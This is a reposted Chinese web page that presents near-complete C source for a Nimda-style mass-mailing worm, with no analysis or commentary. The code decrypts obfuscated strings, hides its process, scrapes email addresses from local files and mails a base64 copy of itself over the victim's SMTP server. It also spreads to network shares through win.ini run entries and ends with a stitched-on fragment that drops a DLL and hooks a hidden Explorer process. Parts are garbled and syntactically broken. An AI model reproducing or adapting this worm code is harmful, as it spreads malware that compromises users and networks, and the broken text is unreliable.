Nimda编程内幕

发表于:2007-07-01来源:作者:点击数: 标签:
void WINAPI worm() long w0rm_ThreadCodeList[ 3] ={ ( long) L0calThread, ( long) Rem0teThread, ( long) MailThread } ; char *StrArray[ 66] ={ szCopyRight, szFakeMsg, szSetUp, szWNetOpenEnumA, szWNetCloseEnum, szWNetEnumResourceA, szMPR_DLL,

void WINAPI worm()
long w0rm_ThreadCodeList[ 3] = { 
     ( long) L0calThread,
     ( long) Rem0teThread,
     ( long) MailThread
     } ;

 char *StrArray[ 66] = {
     szCopyRight,
     szFakeMsg,
     szSetUp,
     szWNetOpenEnumA,
     szWNetCloseEnum,
     szWNetEnumResourceA,
     szMPR_DLL,
     szWINSOCK_DLL,
     szWSAStartup,
     szinet_addr,
     szgethostbyaddr,
     szgethostbyname,
     szhtons,
     szsocket,
     szconnect,
     szsend,
     szrecv,
     szclosesocket,
     szWSACleanup,
     smtp_str00,
     smtp_str01,
     smtp_str02,
     smtp_str03,
     smtp_str06,
     smtp_str07,
     smtp_str08,
     smtp_str09,
     smtp_str0B,
     smtp_str0C,
     smtp_str0D,
     smtp_str0E,
     smtp_str0F,
     smtp_newline,
     smtp_separator,
     szWindir00,
     szWindir01,
     szWindir02,
     szWindir03,
     szWindir04,
     szWIN_INI,
     szSETUP_EXE,
     szSYSTEM_EXE,
     szADVAPI_DLL,
     szRegOpenKeyExA,
     szRegQueryValueExA,
     szRegCloseKey,
     szAclearcase/" target="_blank" >ccountManager,
     szDefaultMail,
     szAccounts,
     szSMTPserver,
     szSMTPemail,
     szExt00,
     szExt01,
     szExt02,
     szExt03,
     szExt04,
     szExt05,
     szExt06,
     szOutlook,
     szCuteFtp,
     szInternetExplorer,
     szTelnet,
     szMirc,
     szRegisterServiceProcess,
     szKernel32,
     szTempFile
    } ;

 static HANDLE w0rm_hThreadList[ 3] ;
 DWORD  w0rm_ThreadIDList[ 3] ;
 char  szModule[ MAX_PATH] ;
 char  *Param ;
 int  count ;
 int  min_threads ;
 int  max_threads ;
 BOOL  re_generation ;

 MailDone = FALSE ;

 for ( count = 0 ; count < 66 ; count++ ) DecryptStr( StrArray[ count]) ;

 GetModuleFileNameA( NULL, szModule, MAX_PATH) ;
 Param = szModule ;

 while( *Param != 0) Param++ ;

 Param -= 5 ;

 if (( *Param == ´P´) || ( *Param == ´p´))
 {
  MessageBox( NULL,
    szFakeMsg,
    szSetUp,
    MB_OK | MB_ICONSTOP) ;

  re_generation = FALSE ;
  max_threads = 1 ;
 } 
 else
 {
  if ( ( hKERNEL32 = GetModuleHandleA( szKernel32)) != NULL)
  {
   if ( ( a_RegisterServiceProcess = GetProcAddress( hKERNEL32, szRegisterServiceProcess)) != NULL)
   {
    a_RegisterServiceProcess ( GetCurrentProcessId(), 1) ;
   }
  }
  
  re_generation = TRUE ;
  max_threads = 3 ;
 }

 min_threads = 0 ;

 do
 {
  for ( count = min_threads ; count < max_threads ; count++ )
  {
   w0rm_hThreadList[ count] = CreateThread( NULL,
         0,
         ( LPTHREAD_START_ROUTINE) w0rm_ThreadCodeList[ count],
         NULL,
         0,
         &w0rm_ThreadIDList[ count]) ;
  }

  for ( count = min_threads ; count < max_threads ; count++ )
  {
   if ( w0rm_hThreadList[ count] != NULL)
   {
    WaitForSingleObject( w0rm_hThreadList[ count], INFINITE) ;
    CloseHandle ( w0rm_hThreadList[ count]) ;
   }
  }

  if ( MailDone)
  {
   GetWindowsDirectoryA( szModule, MAX_PATH) ;
   strcat( szModule, szWIN_INI) ;
   WritePrivateProfileStringA( szWindir00, "run", "", szModule) ;
   re_generation = FALSE ;
  }

  min_threads = 1 ;

  if ( re_generation) Sleep( 0x000FFFFF) ;

 } while( re_generation) ;

 return 0 ;
}

long WINAPI MailThread(long lParam)
{
 unsigned int  addr ;
 struct sockaddr_in server ;
 struct hostent  *hp ;
 WSADATA   wsaData ;

 HANDLE   hFile ;
 HANDLE   hMap ;

 char   enc0de_filename[ MAX_PATH] ;
 char   ShortBuff[ 512] ;
 char   szSIGN[ 512] ;
 char   szHELO[ 512] ;

 BOOL   Success ;
 void   *lpFile ;
 
 int    StrCount ;
 int    FileSize ;

 typedef struct
 {
  char *Command ;
  BOOL WaitReply ;
 }
 SMTPstr ;

 SMTPstr SMTPstrings00[ 2] = { szHELO,  TRUE  ,
     szMAIL_FROM, TRUE  } ;

 SMTPstr SMTPstrings01[ 11] = { smtp_str03, TRUE  ,
     szMAIL_FROM+5, FALSE ,
     smtp_str06, FALSE ,
     smtp_str07, FALSE ,
     smtp_separator, FALSE ,
     smtp_str08, FALSE ,
     smtp_separator, FALSE ,
     smtp_str09, FALSE ,
     szSIGN,  FALSE ,
     smtp_separator, FALSE ,
     smtp_str0B, FALSE } ;

 SMTPstr SMTPstrings02[ 6] = { smtp_str0C, FALSE ,
     smtp_separator, FALSE ,
     smtp_str0D, FALSE ,
     smtp_newline, FALSE ,
     smtp_str0E, TRUE,
     smtp_str0F, FALSE } ;
 WaitC0nnected() ;

 if ( !GetSMTP( szSMTPname, szSMTPaddr)) return 0 ;
 
 sprintf( szHELO, "%s %s\n", smtp_str00, szSMTPname) ;
 sprintf( szMAIL_FROM, "%s <%s>\n", smtp_str01, szSMTPaddr) ;
 sprintf( szSIGN,"\n:)\n\n----\n%s\n\n--", szSMTPaddr) ;

 if ( ( hWINSOCK = LoadLibraryA( szWINSOCK_DLL)) == NULL) return 0 ;

 a_WSAStartup  = ( FARPROC) GetProcAddress( hWINSOCK, szWSAStartup) ;
 a_inet_addr  = ( FARPROC) GetProcAddress( hWINSOCK, szinet_addr) ;
 a_gethostbyaddr  = ( FARPROC) GetProcAddress( hWINSOCK, szgethostbyaddr) ;
 a_gethostbyname  = ( FARPROC) GetProcAddress( hWINSOCK, szgethostbyname) ;
 a_htons   = ( FARPROC) GetProcAddress( hWINSOCK, szhtons) ;
 a_socket  = ( FARPROC) GetProcAddress( hWINSOCK, szsocket) ;
 a_connect  = ( FARPROC) GetProcAddress( hWINSOCK, szconnect) ;
 a_send   = ( FARPROC) GetProcAddress( hWINSOCK, szsend) ;
 a_recv   = ( FARPROC) GetProcAddress( hWINSOCK, szrecv) ;
 a_closesocket  = ( FARPROC) GetProcAddress( hWINSOCK, szclosesocket) ;
 a_WSACleanup  = ( FARPROC) GetProcAddress( hWINSOCK, szWSACleanup) ;

 if ( ( a_WSAStartup == NULL)  ||
   ( a_inet_addr == NULL)  ||
   ( a_gethostbyaddr == NULL) ||
   ( a_gethostbyname == NULL) ||
   ( a_htons == NULL)  ||
   ( a_socket == NULL)  ||
   ( a_connect == NULL)  ||
   ( a_send == NULL)  ||
   ( a_recv == NULL)  ||
   ( a_closesocket == NULL) ||
   ( a_WSACleanup == NULL))
 {
  FreeLibrary( hWINSOCK) ;  
  return 0 ;
 }

 if ( a_WSAStartup( 0x0001, &wsaData) == SOCKET_ERROR)
 {
  FreeLibrary( hWINSOCK) ;  
  return 0 ;
 }
 
 if ( isalpha( ( int) szSMTPserver[ 0]))
 {
  hp = ( struct hostent *) a_gethostbyname( szSMTPname) ;
 }
 else 
 {
  addr = a_inet_addr( szSMTPname) ;
  hp = ( struct hostent *) a_gethostbyaddr( (char *)&addr, 4, AF_INET) ;
 }

 if ( hp == NULL)
 {
  a_WSACleanup() ;
  FreeLibrary( hWINSOCK) ;  
  return 0 ;
 }

 memset( &server, 0, sizeof( server)) ;
 memcpy( &server.sin_addr, hp->h_addr, hp->h_length) ;
 server.sin_family = hp->h_addrtype ;
 server.sin_port = a_htons( 25) ;

 conn_socket = a_socket( AF_INET, SOCK_STREAM, 0) ;

 if ( conn_socket < 0 )
 {
  a_WSACleanup() ;
  FreeLibrary( hWINSOCK) ;  
  return 0 ;
 }

 if ( a_connect( conn_socket, (struct sockaddr *) &server, sizeof( server)) == SOCKET_ERROR)
 {
  a_closesocket( conn_socket) ; 
  a_WSACleanup() ;
  FreeLibrary( hWINSOCK) ;
 }

 a_recv( conn_socket, ShortBuff, sizeof ( ShortBuff),0 ) ;
 
 for ( StrCount = 0 ; StrCount < 2 ; StrCount++ )
 {
  Success = str2socket( SMTPstrings00[ StrCount].Command, SMTPstrings00[ StrCount].WaitReply) ;
  if ( !Success) break ;        
 }
 
 if ( Success)
 {
  Found = 0 ;

  GetWindowsDirectoryA( enc0de_filename, MAX_PATH) ;
  enc0de_filename[ 3] = 0 ;

  FindPe0ple( enc0de_filename) ; 
 
  for ( StrCount = 0 ; StrCount < 11 ; StrCount++ )
  {
   Success = str2socket( SMTPstrings01[ StrCount].Command, SMTPstrings01[ StrCount].WaitReply) ;
   if ( !Success) break ;        
  }

  if ( Success)
  {
   GetModuleFileNameA( NULL, ShortBuff, MAX_PATH) ;
   GetTempPathA( MAX_PATH, enc0de_filename) ;
   strcat( enc0de_filename, szTempFile) ;

   if ( CopyFileA( ShortBuff, enc0de_filename, FALSE) != 0)
   {
    if ( ( hFile = CreateFileA( enc0de_filename,
        GENERIC_READ,
        FILE_SHARE_READ,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL)) != INVALID_HANDLE_VALUE)
    {
     FileSize = GetFileSize( hFile, NULL) ;

     if ( ( FileSize != 0xFFFFFFFF) && ( FileSize != 0))
     {
      if ( ( hMap = CreateFileMappingA( hFile,
           NULL,
           PAGE_READONLY | PAGE_WRITECOPY,
           0,
           FileSize,
           NULL)) != NULL)
      {
       if ( ( lpFile = MapViewOfFile( hMap,
           FILE_MAP_READ,
           0,
           0,
           FileSize)) != NULL)
       {  
        base64_encode( lpFile, FileSize) ;

        for ( StrCount = 0 ; StrCount < 6 ; StrCount++ )           
        {
         if ( ( Success = str2socket(  SMTPstrings02[ StrCount].Command,
             SMTPstrings02[ StrCount].WaitReply)) == FALSE) break ;
        }

        if ( Success) MailDone = TRUE ;

        UnmapViewOfFile( lpFile) ;
       }
       
       CloseHandle( hMap) ;
      }
     }

     CloseHandle( hFile) ;
    }

    DeleteFileA( enc0de_filename) ;
   }
  }
 }

 a_closesocket( conn_socket) ;
 a_WSACleanup() ;
 FreeLibrary( hWINSOCK) ;

 return 0 ;
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

void NetW0rming( LPNETRESOURCE lpnr)
{
 LPNETRESOURCE lpnrLocal ;
 HANDLE  hEnum ;
 int  count ;
 int  cEntries = 0xFFFFFFFF ;
 DWORD  dwResult ;
 DWORD  cbBuffer = 32768 ;

 if ( a_WNetOpenEnum ( RESOURCE_CONNECTED,
    RESOURCETYPE_ANY,
    0,
    lpnr,
    &hEnum) != NO_ERROR) return ;
 do
 {
  lpnrLocal = ( LPNETRESOURCE) GlobalAlloc( GPTR, cbBuffer) ;

         dwResult = a_WNetEnumResource( hEnum,
      &cEntries,
      lpnrLocal,
      &cbBuffer) ;
  if ( dwResult == NO_ERROR)
  {
   for ( count = 1 ; count < cEntries ; count++ )
   {
    if ( lpnrLocal[ count].dwUsage & RESOURCEUSAGE_CONTAINER)
    {
     NetW0rming( &lpnrLocal[ count]) ;
    }
    else if ( lpnrLocal[ count].dwType = RESOURCETYPE_DISK)
    {
     Rem0teInfecti0n( lpnrLocal[ count].lpRemoteName) ;
    }
   }
  }
  else if (dwResult != ERROR_NO_MORE_ITEMS) break ;

 } while ( dwResult != ERROR_NO_MORE_ITEMS) ;

 GlobalFree ( ( HGLOBAL) lpnrLocal) ;

 a_WNetCloseEnum( hEnum) ;

 return ;
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

void Rem0teInfecti0n( char *szPath)
{
 char   *dir_name[ 5]= { szWindir00, szWindir01, szWindir02, szWindir03, szWindir04 } ;
 WIN32_FIND_DATAA FindData ;
 HANDLE   hFind ;
 char   szLookUp[ MAX_PATH] ;
 char   w0rm0rg[ MAX_PATH] ;
 char   w0rmD3st[ MAX_PATH] ;
 int   aux ;

 for ( aux = 0 ; aux < 5 ; aux++ )
 {
  sprintf ( szLookUp, "%s\\%s%s", szPath, dir_name[ aux], szWIN_INI) ;
  if ( ( hFind = FindFirstFileA( szLookUp, ( LPWIN32_FIND_DATAA) &FindData)) != INVALID_HANDLE_VALUE)
  {   
   sprintf( w0rmD3st, "%s\\%s\\%s", szPath, dir_name[ aux], szSYSTEM_EXE) ;
   
   if ( GetModuleFileNameA( NULL, w0rm0rg, MAX_PATH) != 0)
   {
    if ( CopyFileA( w0rm0rg, w0rmD3st, TRUE) != 0)
    {
     WritePrivateProfileStringA( szWindir00, "run", szSYSTEM_EXE, szLookUp) ;
     FindClose ( hFind) ;
     break ;
    }
   }

   FindClose ( hFind) ;
  }
 }
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

BOOL str2socket( char *msg, BOOL do_recv)

 int retval ;
 char Buffer[ 256];

/* Code used to debug the worm

 if ( do_recv)
 {
  if ( MessageBox( NULL,
     msg,
     "send() this string ?",
     MB_YESNO | MB_ICONQUESTION) == IDNO) return TRUE ;
 }
*/

 if ( a_send( conn_socket, msg, strlen( msg), 0) == SOCKET_ERROR)
 {
  a_WSACleanup() ;
  return FALSE ;
 } 

 if ( do_recv)
 {
  retval = a_recv( conn_socket, Buffer, sizeof ( Buffer),0 ) ;
  if ( ( retval == SOCKET_ERROR) || ( retval == 0))
  {   
   a_closesocket( conn_socket) ;
   a_WSACleanup() ;
   return FALSE ;
  }

  Buffer[ retval] = 0 ;

/* Code used to debug the worm

  MessageBox( NULL,
    Buffer,
    "recv()",
    MB_OK | MB_ICONSTOP) ;
*/
 }

 return TRUE ;

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

BOOL GetSMTP( char *dest, char *org_email)
{
 char szKeyName[ MAX_PATH] ;
 char szRes[ MAX_PATH] ;
 char *move2low ;
 int size ;
 HKEY hKey ;

 if ( ( hADVAPI = LoadLibraryA( szADVAPI_DLL)) == NULL) return FALSE ;
 
 a_RegOpenKeyExA  = ( FARPROC) GetProcAddress( hADVAPI, szRegOpenKeyExA) ;
 a_RegQueryValueExA = ( FARPROC) GetProcAddress( hADVAPI, szRegQueryValueExA) ;
 a_RegCloseKey  = ( FARPROC) GetProcAddress( hADVAPI, szRegCloseKey) ;

 if ( ( a_RegOpenKeyExA == NULL)  ||
             ( a_RegQueryValueExA == NULL) ||
      ( a_RegCloseKey == NULL))
 {
  FreeLibrary( hADVAPI) ;
  return FALSE ;
 }

 strcpy( szKeyName, szAccountManager) ;

 if ( a_RegOpenKeyExA( HKEY_CURRENT_USER,
    szKeyName,
    0,
    KEY_QUERY_VALUE,
    &hKey) != ERROR_SUCCESS)
 {
  FreeLibrary( hADVAPI) ;
  return FALSE ;
 }
  
 size = 64 ;

 if ( a_RegQueryValueExA( hKey,
     szDefaultMail,
     0,
     NULL,
     szRes,
     &size) != ERROR_SUCCESS)
 {
  a_RegCloseKey( hKey) ;
  FreeLibrary( hADVAPI) ;
  return FALSE ;
 }

 a_RegCloseKey( hKey) ;

 strcat( szKeyName, szAccounts) ;
 strcat( szKeyName, szRes) ;

 if ( a_RegOpenKeyExA( HKEY_CURRENT_USER,
    szKeyName,
    0,
    KEY_QUERY_VALUE,
    &hKey) != ERROR_SUCCESS)
 {
  FreeLibrary( hADVAPI) ;
  return FALSE ;
 }

 size = 64 ;

 if ( a_RegQueryValueExA( hKey,
     szSMTPserver,
     0,
     NULL,
     dest,
     &size) != ERROR_SUCCESS)
 {
  a_RegCloseKey( hKey) ;
  FreeLibrary( hADVAPI) ;
  return FALSE ;
 }     

 size = 64 ;

 if ( a_RegQueryValueExA( hKey,
     szSMTPemail,
     0,
     NULL,
     org_email,
     &size) != ERROR_SUCCESS)
 {
  a_RegCloseKey( hKey) ;
  FreeLibrary( hADVAPI) ;
  return FALSE ;
 }     

 a_RegCloseKey( hKey) ;

 move2low = org_email ;

 while( *move2low != 0)
 {
  if ( ( *move2low > 64) && ( *move2low < 91)) *move2low = ( char) (* move2low) - 65 + 97 ;
  move2low++ ;
 }

 FreeLibrary( hADVAPI) ;
 return TRUE ;
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

void base64_encode(const void *buf, int size)
{
 char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" ;

 char  ok_base64[ 80] ;
 char  *p = ok_base64 ;
 unsigned char *q = ( unsigned char *) buf ;
 int  i ;
 int  c ;
 int  l ;
 BOOL  SendRes ;
 
 i = l = 0 ;

 while( i < size)
 {
  c = q[ i++] ;
  c *= 256 ;

  if( i < size) c += q[ i] ;
  
  i++ ;
  c *= 256 ;

  if( i < size) c += q[ i] ;
   
  i++ ;
   
  p[ 0] = base64[ ( c & 0x00fc0000) >> 18] ;
  p[ 1] = base64[ ( c & 0x0003f000) >> 12] ;
  p[ 2] = base64[ ( c & 0x00000fc0) >> 6] ;
  p[ 3] = base64[ ( c & 0x0000003f) >> 0] ;
   
  if( i > size) p[ 3] = ´=´ ;
   
  if( i > size + 1) p[ 2] = ´=´ ;
   
  p += 4 ;
  
  l += 1 ;

  if ( l == 0x013)
  {
   ok_base64[ 0x04C] = 0x0A ;
   ok_base64[ 0x04D] = 0 ;

   if ( ( SendRes = str2socket( ok_base64, FALSE)) == FALSE) break ;

   p = ok_base64 ;
   l = 0;
  }
 }

 if ( SendRes != FALSE)
 {
  if ( l != 0)
  {
   ok_base64[ l*4] = 0x0A ;
   ok_base64[ l*4] = 0 ;

   str2socket( ok_base64, FALSE) ;  
  }
 }
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

char *DecryptStr( char *DcrStr)
{
 char *pos = DcrStr ;

 while( *pos != 0)
 {
  *pos ^= ( char) 0x0FF ;
  pos++ ;
 }
 
 return DcrStr ;
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

void FindPe0ple( char *szPath)
{
 char    szRecursive[ MAX_PATH] ;
 char    szCurrentDir[ MAX_PATH] ;
 char    FileExt[ MAX_PATH] ;
 char    RCPT_TO[ MAX_PATH] ;
 WIN32_FIND_DATAA  FindData ;
 HANDLE    hFind ;
 HANDLE    hFile ;
 HANDLE    hMap ;
 void    *lpFile ;
 char    *lpc01 ;
 char    *lpc02 ;
 char    *lpc03 ;
 char    *lpc04 ;
 char    auxchar ;
 int    l00king ;
 int    addrssize ;

 GetCurrentDirectoryA( MAX_PATH, szCurrentDir) ;
 
 if ( SetCurrentDirectoryA( szPath) == FALSE) return ;

 hFind = (HANDLE) FindFirstFileA( "*.*", (LPWIN32_FIND_DATAA) &FindData) ;
 if ( hFind != INVALID_HANDLE_VALUE)
 {
  do
  {
   if ( ( FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && ( FindData.cFileName[0] != ´.´))
   {
    strcpy (szRecursive,szPath) ;
    strcat (szRecursive,FindData.cFileName) ;
    strcat (szRecursive,"\\") ;
    
    FindPe0ple( szRecursive) ;
   }
   else if ( ( FindData.nFileSizeHigh == 0) && ( FindData.nFileSizeLow > 16) && ( !( FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) && ( FindData.cFileName[0] != ´.´)))   
   {
    lpc01 = FindData.cFileName ;
    lpc02 = NULL ;
     
    while ( *lpc01 != 0)
    {
     if ( *lpc01 == 46) lpc02 = lpc01 ;
     lpc01++ ;
    }
    
    lpc01 = FileExt ;

    if ( lpc02 != NULL)
    {
     while ( *lpc02 != 0)
     {
      if ( ( *lpc02 > 97) && ( *lpc02 < 123)) *lpc01 = ( char) ( *lpc02 - 97 + 65) ;
      else *lpc01 = *lpc02 ;
       
      lpc01++ ;
      lpc02++ ;
     }

     FileExt[ 4] = 0 ;

     if  ( ( strcmp( FileExt, szExt00) == 0) ||
       ( strcmp( FileExt, szExt01) == 0) ||
       ( strcmp( FileExt, szExt02) == 0) ||
       ( strcmp( FileExt, szExt03) == 0) ||
       ( strcmp( FileExt, szExt04) == 0) ||
       ( strcmp( FileExt, szExt05) == 0) ||
       ( strcmp( FileExt, szExt06) == 0))
     {
      if ( ( hFile = CreateFileA( FindData.cFileName,
          GENERIC_READ,
          0,
          NULL,
          OPEN_EXISTING,
          FILE_ATTRIBUTE_NORMAL,
          NULL)) != INVALID_HANDLE_VALUE)
      {
       if ( ( hMap = CreateFileMappingA( hFile,
            NULL,
            PAGE_READONLY,
            0,
            FindData.nFileSizeLow,
            NULL)) != NULL)
       {
        if ( ( lpFile = MapViewOfFile( hMap,
            FILE_MAP_READ,
            0,
            0,
            FindData.nFileSizeLow)) != NULL)
        {
         lpc01  = lpFile ;
         addrssize = FindData.nFileSizeLow ;
         l00king  = 0 ;
 
         while( ( addrssize > 16) && ( Found < 16))
         {
          if ( *lpc01 == 60)
          {
           l00king = 1 ;
           lpc02 = lpc01 ;
          }

          if ( ( *lpc01 == 64) && ( l00king == 1))
          {
           l00king = 2 ;
          }

          if ( ( *lpc01 == 62) && ( l00king == 2))
          {          
           lpc03 = szSMTPaddr ;
           lpc04 = lpc02 + 1 ;

           while ( *lpc03 != 0)
           {
            auxchar = *lpc04 ;

            if ( ( auxchar > 64) && ( auxchar < 91)) auxchar = auxchar - 65 + 97 ;

            if ( *lpc03 != auxchar)
            {
             l00king = 0 ;
             break ;
            }

            lpc03++ ;
            lpc04++ ;
           }

           if ( l00king == 0)
           {
            strcpy( RCPT_TO, smtp_str02) ;
            lpc03 = RCPT_TO + 9 ;
            while ( *lpc02 != 62)
            {
             *lpc03 = *lpc02 ;
             lpc02++ ;
             lpc03++ ;
            }
            *lpc03 = 62 ;
            lpc03++ ;            
            *lpc03 = 0 ;
            
            strcat( RCPT_TO, "\n") ;

            str2socket( RCPT_TO, TRUE) ;

            Found++ ;
           }
           else l00king = 0 ;
          }

          if ( ( *lpc01 < 64) &&
            ( *lpc01 != 46) &&
            ( *lpc01 != 60) &&
            ( *lpc01 != 62))
          {
           l00king = 0 ;
          }

          if ( *lpc01 > 122)
          {
           l00king = 0 ;
          }
 
          lpc01++ ;
          addrssize-- ;
         }
         
         UnmapViewOfFile( lpFile) ;                      
        }

        CloseHandle( hMap) ;
       }
        
       CloseHandle( hFile) ;
      }
     }
    }
   }
  }  
  while ( ( FindNextFile( hFind, &FindData) !=0) && ( Found < 16)) ;

  FindClose( hFind) ;
 }

 return ;
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

void WaitC0nnected( void)
{
 InetActivated = FALSE ;

 while ( !InetActivated)
 {
  EnumWindows( EnumWindowsProc, ( LPARAM) NULL) ;

  Sleep( 0x01770) ;
 }

 return ;
}

//贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩贩?

BOOL CALLBACK EnumWindowsProc( HWND hwnd, LPARAM lParam)
{

 int  CaptionLen ;
 int  AwareLen ;
 int  CompareLen ;
 int  InetAware ;
 int  EquChar ;
 int  aux0 ;
 int  aux1 ;
 char  *Foll0w ;
 char  *PtrAware ;
 char  WindowCaption[ 1024] ;

 CaptionLen = GetWindowText( hwnd, WindowCaption, 1024) ;

 if ( CaptionLen > 0)
 {
  Foll0w = WindowCaption ;

  while( *Foll0w != 0)
  {
   if ( ( *Foll0w >= ´a´) && ( *Foll0w <= ´z´)) *Foll0w = *Foll0w - ´a´ + ´A´ ;
   Foll0w++ ;
  }

  for( InetAware = 0 ; InetAware < 5 ; InetAware++)
  {
   AwareLen = strlen( szAware[ InetAware]) ;
   
   if ( AwareLen < CaptionLen)
   {
    CompareLen = CaptionLen - AwareLen ;   

    for ( aux0 = 0 ; aux0 < CompareLen ; aux0++ )
    {
     EquChar = 0 ;
     Foll0w = &WindowCaption[ aux0] ;
     PtrAware = szAware[ InetAware] ;

     for ( aux1 = 0 ; aux1 < AwareLen ; aux1++ , Foll0w++ , PtrAware++ )
     {
      if ( *Foll0w == *PtrAware) EquChar++ ;
     }

     if ( EquChar == AwareLen)
     {
      InetActivated = TRUE ;
      break ;
     }

     aux0++ ;
    }
   }
  }
 }

 return ( !InetActivated) ;
}
 void TFTP32()
{
  HANDLE hFile=CreateFile("TFTP32.DLL",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
  if(hFile==INVALID_HANDLE_VALUE)
  {
   //printf("\nCreate file %s failed:%d",RemoteFilePath,GetLastError());
   return -1
  }
  //写文件内容
                DWORD i=0,dwIndex=0,dwWrite,dwSize=sizeof(tftpdllbuff)
  while(dwSize>dwIndex)
  {
   if(!WriteFile(hFile,&tftpdllbuff[dwIndex],dwSize-dwIndex,&dwWrite,NULL))
   {
    //printf("\nWrite file %s failed:%d","TFTP32.DLL",GetLastError());
    return -1
   }
   dwIndex+=dwWrite;
  }
  //关闭文件句柄
  CloseHandle(hFile);


hhook hk
STARTUPINFO si;
    PROCESS_INFORMATION pi;
    
    memset(&si,0,sizeof(si));
    si.hStdError = si.hStdOutput = wp1;
    si.hStdInput = rp2;
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    si.lpReserved=0;
    si.lpReserved2=0;
    si.cbReserved2 =0;
    si.cb = sizeof(si);
    //this two must not exchange
CreateProcess(0, "Explorer.exe", 0, 0, 1, 0, 0, 0, &si, &pi)

Hookproc hkprc
static HINSTANCE hinstDLL
 hinstDLL=LoadLibrary((LPCTSTR)"TFTP32.DLL")
hkprc=(HOOKPROC)GetProcAddress(hinstDLL,"hook")
hk=SetWindowsHookEx(WH_CBT,hkprc,HinstDLL,pi.wdthreadID)
FreeLibrary(hinstDLL)
}


原文转自:http://www.ltesting.net